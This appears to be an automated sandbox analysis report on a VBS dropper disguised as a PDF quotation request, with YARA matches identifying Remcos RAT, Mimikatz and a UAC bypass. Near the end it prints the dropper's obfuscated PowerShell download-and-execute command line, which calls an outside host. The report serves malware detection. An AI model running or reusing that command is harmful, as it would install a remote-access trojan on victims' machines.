                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0044A4F028_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0043A5AB28_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0041363128_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0044669028_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0044A73028_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_004398D828_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_004498E028_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0044A88628_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0043DA0928_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00438D5E28_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00449ED028_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0041FE8328_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00430F5428_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004050C229_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004014AB29_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040513329_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004051A429_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040124629_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040CA4629_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040523529_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004032C829_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040168929_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00402F6029_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00416760 appears 69 times
                    Source: Quotation request YN2024-10-07pdf.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11677
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 11677Jump to behavior
                    Source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 5500, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@47/35@7/7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,27_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,22_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,29_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,27_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,22_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,22_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-NACZDT
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmnjomw1.aeg.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSystem information queried: HandleInformation
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: AddInProcess32.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: AddInProcess32.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: AddInProcess32.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
